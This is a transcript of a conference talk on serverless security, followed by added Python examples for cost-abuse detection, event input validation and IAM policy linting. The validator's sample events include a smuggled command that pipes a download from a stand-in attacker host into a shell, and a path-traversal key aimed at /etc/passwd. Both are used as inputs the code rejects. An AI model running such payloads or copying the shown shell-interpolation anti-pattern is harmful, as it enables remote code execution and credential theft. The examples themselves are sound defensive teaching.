apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat

Jean-Baptiste Aviat
CTO & Co-founder
Former (Red Team)
Email: jb@sqreen.io
Twitter: @jbaviat
Podcast:
What is Serverless?
And why is it different?
(Diagram: three architectures rated on how much of the work is code vs. ops)
Monolithic applications: business logic 100% written by developers. Code ⭐⭐⭐⭐⭐, Ops ⭐
Microservices (Auth, File upload, Business service #1, Business service #2, Push service, Async workers): Code ⭐⭐⭐, Ops ⭐⭐⭐
Serverless: Code ⭐, Ops ⭐⭐⭐
Axes: more code → less code; dev and ops distance
Ad-hoc usage: easier to deploy
Dynamically configure cloud elements, transform data on the go, comply with cloud vendors' requirements.
Teams use it to circumvent processes / CI / deploy.
Native serverless applications
Build applications designed for serverless infrastructures.
How does serverless impact security?
(Diagram: Dev / Sec / Ops overlap for a monolithic app, microservices and serverless)
Serverless forces bridging dev, sec & ops
What “serverless” means is moving too fast
Edge serverless, ad-hoc, infra
Scale is different (1 monolithic app → 5 microservices → 100 serverless functions)
No tool allows you to visualize all of your lambdas at once (and the spreadsheet doesn't work at this scale and pace!)
The space hasn't reached maturity yet:
● No commonly accepted best practices, but a broad variety of best practices
● Evolving fast
Monitoring: ❌   Protection: ❌
New challenges 🚨:
● No way to visualize deployments
● Best practices still change rapidly
● Entrypoints vary widely (HTTP? Queue? Stream? Database?)
● Higher coupling to the cloud provider requires a strong cloud security posture
Solved challenges ✅:
● System updates (unless Docker based!)
● Network-level security (mTLS, …)
Scaling challenges 🤯:
● Developers do 20 ⨉ more ops
● 1 microservice = 20 ⨉ functions
● 20 ⨉ vulnerable dependencies?
● 20 ⨉ ownership tracking?
● 20 ⨉ threat modeling?
● New functions appearing 20 ⨉ faster?
Serverless security: what can we do?
Use infrastructure as code (Terraform, CloudFormation, …)
Shift your infrastructure left (but it is much simpler than for microservices*)
● With serverless, part of the business logic is handled by the infrastructure
● Serverless app developers own both the code and part of the infrastructure
Use the principle of least privilege for your lambdas (but with reasonable granularity!)
Monitor your costs (and be ready to block abuses)
* Network security, encryption and mutual authentication are mostly ensured by proper use of cloud services.
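Cost monitoring, as an added worked example (this code is mine, not from the talk or Sqreen): a denial-of-wallet detector that flags a function whose current invocation window spikes against its own baseline or exceeds a per-function budget, and emits the block action the responder would send. The metric rows are constructed here in the shape of CloudWatch Lambda `Invocations` sums per 5-minute period; the function names, thresholds and budgets are assumptions, and the block step (reserved concurrency 0, which AWS Lambda exposes as `put_function_concurrency`) is returned as data rather than sent.

```python
from statistics import median
from typing import Optional


def spike_factor(history: list[int], current: int) -> float:
    """Latest window versus the median of the preceding windows. The median is
    used so one earlier burst cannot inflate the baseline and hide a second one."""
    base = median(history) if history else 0
    if base == 0:
        return float("inf") if current > 0 else 0.0
    return current / base


def functions_to_block(metrics: dict[str, list[int]], factor: float = 10.0,
                       min_invocations: int = 1000,
                       budgets: Optional[dict[str, int]] = None) -> list[str]:
    """metrics: function name -> invocation sums per 5-minute window, oldest
    first, last element = current window. A function is flagged when its
    current window is at least `factor` times its baseline AND above the
    absolute floor (a cron function waking from 0 to 12 calls is not an attack),
    or when it exceeds the per-function budget declared next to its IaC."""
    budgets = budgets or {}
    flagged: list[str] = []
    for name, windows in metrics.items():
        *history, current = windows
        over_budget = current > budgets.get(name, float("inf"))
        spiking = spike_factor(history, current) >= factor and current >= min_invocations
        if spiking or over_budget:
            flagged.append(name)
    return flagged


def block_plan(names: list[str]) -> list[dict]:
    """The calls a responder would make: reserved concurrency 0 stops every
    invocation of the function without deleting it. Returned as data here
    instead of calling boto3 so the example runs offline."""
    return [{"action": "put_function_concurrency", "FunctionName": n,
             "ReservedConcurrentExecutions": 0} for n in names]


# Constructed metrics (assumption: six 5-minute windows per function).
METRICS = {
    "image-resize": [120, 135, 118, 142, 130, 6900],     # 53x spike: abuse
    "nightly-report": [0, 0, 0, 0, 0, 12],               # woke up, under the floor
    "orders-api": [4000, 4200, 3900, 4100, 4050, 4300],  # steady traffic
    "pdf-export": [300, 310, 290, 305, 300, 2000],       # 6.6x, but over budget
}
BUDGETS = {"orders-api": 5000, "pdf-export": 1500}  # assumed per-window budgets

if __name__ == "__main__":
    for plan in block_plan(functions_to_block(METRICS, budgets=BUDGETS)):
        print(plan)
```

The absolute floor matters as much as the ratio: most serverless fleets contain many near-idle functions whose first real invocation would otherwise trip a pure ratio test.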
Keep best practices (OWASP top 10): injections, vulnerable dependencies, lack of monitoring, AuthN / AuthZ issues
NEW: scalability & coherency: design strong function frameworks (CI, deployment, logging frameworks, …)
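The "entrypoints vary widely" challenge meets the OWASP basics here: injection does not only arrive over HTTP. As an added example (mine, not from the talk), one validation gate sits in front of HTTP, SQS and S3 entrypoints, with the shell-string anti-pattern shown next to the argv form. Event shapes follow the AWS API Gateway REST proxy, SQS and S3 notification formats; the `reports/<customer>/<date>.csv` key convention, the handler and the sample events are constructed for this example.

```python
import json
import re
from typing import Any
from urllib.parse import unquote_plus

# Assumption of this example: report files live under reports/<customer>/<date>.csv.
# Anything else is rejected before it can reach a shell, a path or a query.
SAFE_KEY = re.compile(r"^reports/[A-Za-z0-9_-]{1,64}/\d{4}-\d{2}-\d{2}\.csv$")


class RejectedInput(ValueError):
    """Raised when an event carries input that fails validation."""


def extract_object_keys(event: dict[str, Any]) -> list[str]:
    """Pull the untrusted 'object key' out of whichever entrypoint invoked the
    function. Each source nests it differently, which is why per-entrypoint
    parsing must feed one shared validator instead of validating ad hoc."""
    if "httpMethod" in event:
        # API Gateway REST proxy event: the key is a query-string parameter.
        params = event.get("queryStringParameters") or {}
        return [str(params.get("key", ""))]
    keys: list[str] = []
    for rec in event.get("Records", []):
        source = rec.get("eventSource")
        if source == "aws:sqs":
            # SQS: the body is an opaque string; anyone with SendMessage on the
            # queue controls it, so it is as untrusted as an HTTP parameter.
            body = json.loads(rec.get("body") or "{}")
            keys.append(str(body.get("key", "")))
        elif source == "aws:s3":
            # S3 notification: the key is URL-encoded, and the uploader chose it.
            keys.append(unquote_plus(rec["s3"]["object"]["key"]))
        else:
            raise RejectedInput(f"unsupported event source {source!r}")
    return keys


def validate_key(key: str) -> str:
    """The single gate every entrypoint goes through."""
    if not SAFE_KEY.fullmatch(key):
        raise RejectedInput(f"object key rejected: {key!r}")
    return key


def build_vulnerable_command(key: str) -> str:
    """Anti-pattern: event data interpolated into a shell string. Returned rather
    than executed so the injected payload stays visible; with shell=True the
    SQS_EVENT key below would run curl with the function's credentials."""
    return f"gzip -k /tmp/{key}"


def build_safe_argv(key: str) -> list[str]:
    """Hardened form: validated key, argv list, no shell involved."""
    return ["gzip", "-k", "/tmp/" + validate_key(key)]


def handler(event: dict[str, Any], context: Any = None) -> dict[str, Any]:
    """Entrypoint-agnostic handler: every key passes validate_key or is dropped."""
    accepted: list[list[str]] = []
    rejected: list[str] = []
    for key in extract_object_keys(event):
        try:
            accepted.append(build_safe_argv(key))
        except RejectedInput as exc:
            rejected.append(str(exc))  # log and drop; never fall back to the raw key
    return {"accepted": accepted, "rejected": rejected}


# Constructed sample events: shapes follow the AWS formats, values are made up.
HTTP_EVENT = {"httpMethod": "GET",
              "queryStringParameters": {"key": "reports/acme/2024-05-01.csv"}}
SQS_EVENT = {"Records": [{"eventSource": "aws:sqs", "body": json.dumps(
    {"key": "reports/acme/2024-05-01.csv; curl http://attacker.example/x | sh"})}]}
S3_EVENT = {"Records": [{"eventSource": "aws:s3",
                         "s3": {"object": {"key": "reports/../../etc/passwd"}}}]}

if __name__ == "__main__":
    for name, ev in (("http", HTTP_EVENT), ("sqs", SQS_EVENT), ("s3", S3_EVENT)):
        print(name, handler(ev))
```

The same shape applies to a database stream or a scheduled event: extract, then validate with the one allowlist the business logic actually needs, then pass arguments as data (argv, parameterized query, ORM call), never as a string the next component has to parse.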
New functions appear and disappear at a higher rate than ever
Leverage developers' tools as much as possible to:
● Monitor that security controls are applied
● Monitor the permissions used
● Ensure production doesn't drift from IaC
IaC / Terraform makes it easy to inspect
IaC / Terraform allows applying static controls (and breaking CI if needed)
Cloud APIs allow listing and inspecting running functions/containers dynamically
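Slides 15 and 17 together, as an added example (mine, not the talk's): a CI gate that applies static controls to function IAM policies and compares the IaC inventory against what the cloud API reports, failing the build on wildcards, escalation paths or drift. Policy documents are in the AWS IAM JSON format; the IaC inventory and the deployed list are constructed in the shape of a Serverless/Terraform function map and of boto3 `lambda.list_functions()` output; the escalation and resource-star allowlist action sets, the function names and the 123456789012 account are assumptions.

```python
from typing import Any, Iterable

# Assumptions of this example: actions that become a privilege-escalation path
# when allowed on Resource "*", and actions AWS documents as not supporting
# resource-level permissions (so Resource "*" is the only option for them).
ESCALATION_ACTIONS = {"iam:PassRole", "iam:CreatePolicyVersion", "lambda:UpdateFunctionCode"}
RESOURCE_STAR_OK = {"xray:PutTraceSegments", "xray:PutTelemetryRecords"}


def _as_list(value: Any) -> list:
    # IAM lets Statement, Action and Resource be a single value or a list.
    return value if isinstance(value, list) else [value]


def lint_policy(name: str, policy: dict[str, Any]) -> list[str]:
    """Static control over one IAM policy document (AWS JSON format).
    Returns findings; an empty list means the policy passes the gate."""
    findings: list[str] = []
    for i, st in enumerate(_as_list(policy.get("Statement", []))):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        star_resource = "*" in _as_list(st.get("Resource", []))
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"{name}: statement {i} allows wildcard action {action}")
            if action in ESCALATION_ACTIONS and star_resource:
                findings.append(f"{name}: statement {i} allows {action} on any resource (escalation path)")
        if star_resource and not all(a in RESOURCE_STAR_OK for a in actions):
            findings.append(f'{name}: statement {i} uses Resource "*"')
    return findings


def find_drift(iac: dict[str, dict[str, str]],
               deployed: Iterable[dict[str, Any]]) -> dict[str, list[str]]:
    """Compare the functions declared in IaC with what the cloud API reports.
    `deployed` items are shaped like boto3 lambda.list_functions()["Functions"]."""
    drift: dict[str, list[str]] = {"unmanaged": [], "missing": [], "changed": []}
    seen: set[str] = set()
    for fn in deployed:
        name = fn["FunctionName"]
        seen.add(name)
        if name not in iac:
            drift["unmanaged"].append(name)  # deployed by hand, outside IaC and review
            continue
        for field in ("Role", "Runtime"):
            if fn.get(field) != iac[name].get(field):
                drift["changed"].append(
                    f"{name}.{field}: iac={iac[name].get(field)!r} live={fn.get(field)!r}")
    drift["missing"] = sorted(set(iac) - seen)
    return drift


def ci_gate(policies: dict[str, dict[str, Any]], iac: dict[str, dict[str, str]],
            deployed: Iterable[dict[str, Any]]) -> tuple[int, list[str]]:
    """Exit status for the CI job (1 breaks the build) plus the report lines."""
    report = [f for fn, pol in policies.items() for f in lint_policy(fn, pol)]
    drift = find_drift(iac, deployed)
    report += [f"unmanaged function: {n}" for n in drift["unmanaged"]]
    report += [f"drift: {c}" for c in drift["changed"]]
    return (1 if report else 0), report


# Constructed inventories (names, roles and the 123456789012 account are made up).
ROLE = "arn:aws:iam::123456789012:role/"
IAC_FUNCTIONS = {
    "orders-api": {"Role": ROLE + "orders-api", "Runtime": "python3.12"},
    "orders-worker": {"Role": ROLE + "orders-worker", "Runtime": "python3.12"},
}
DEPLOYED = [  # what list_functions() would return, trimmed to the fields used
    {"FunctionName": "orders-api", "Role": ROLE + "orders-api", "Runtime": "python3.12"},
    {"FunctionName": "orders-worker", "Role": ROLE + "orders-admin", "Runtime": "python3.12"},
    {"FunctionName": "adhoc-test-export", "Role": ROLE + "admin", "Runtime": "nodejs18.x"},
]
POLICIES = {
    "orders-api": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
         "Resource": "arn:aws:dynamodb:eu-west-1:123456789012:table/orders"}]},
    "orders-worker": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"}]},
}

if __name__ == "__main__":
    status, lines = ci_gate(POLICIES, IAC_FUNCTIONS, DEPLOYED)
    print("\n".join(lines) or "clean")
    raise SystemExit(status)
```

The static half runs on every pull request against the rendered policy documents; the drift half runs on a schedule with read-only cloud credentials, so a function pushed from a laptop to "circumvent CI" shows up as unmanaged within one run.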
● Maintain the OWASP top 10
● Adopt a strong cloud security posture
● Generalize the principle of least privilege
● Ensure serverless projects use IaC (Terraform, CloudFormation, …)
● Leverage cloud APIs to automate controls and monitoring
● Monitor serverless cost
● Ensure coherency amongst function deployments
Four pillars: OWASP top 10 · Cloud security posture · Serverless cost monitoring · Unified deployments
Use the Serverless framework or Terraform
● With safe, relevant examples
● Coupled with CI
Provide relevant & safe code examples
● Using ORM / validation / logging / …
● Coupled with CI
Prepare provisioning for:
● A working deployment
● A CI job to deploy & run linting / static analysers
Document how to deploy secrets
Git repository best practices:
● Mandatory pull requests
● Require a CODEOWNERS file
● Lock the master branch
Serverless shifts complexity from application code to the infrastructure.
Serverless doesn't mean no ops, but:
● Different kinds of ops are done by different personas
● Ops are much simpler compared to microservices (mTLS, peer to peer, etc.)
Some security risks occur more often (20 times!), some appear, and a few disappear.
Cloud security takes a much more important stance.
Scaling development practices (CI, CD, frameworks, BoM) becomes a requirement.
CSA - The 12 Most Critical Risks for Serverless Applications
OWASP top 10
OWASP serverless top 10
Serverless framework
Terraform, CloudFormation
CODEOWNERS (GitHub, GitLab)
AppSec Builders podcast
Or get in touch / ask me directly:
Email: jb@sqreen.io
Twitter: @jbaviat
Podcast:
Credits to Theodo
Credits to Marcin
Credits to https://twitter.com/alex_frantic?lang=en
Podcast
Serverless is changing fast (timeline):
2008: Google App Engine
2014: AWS Lambda
2016: Google Cloud Functions, Azure Functions, IBM Cloud Functions, AWS Lambda@Edge
2017: Cloudflare Workers
2019: Fastly edge workers
2020: Netlify functions
Future: more edge, more glue
“We are discovering new services, tools and patterns weekly” (source: any serverless specialist)
Easier & faster to deploy
Move from “your code does it all” towards “your code does the business logic, your cloud provider is the glue”

apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat
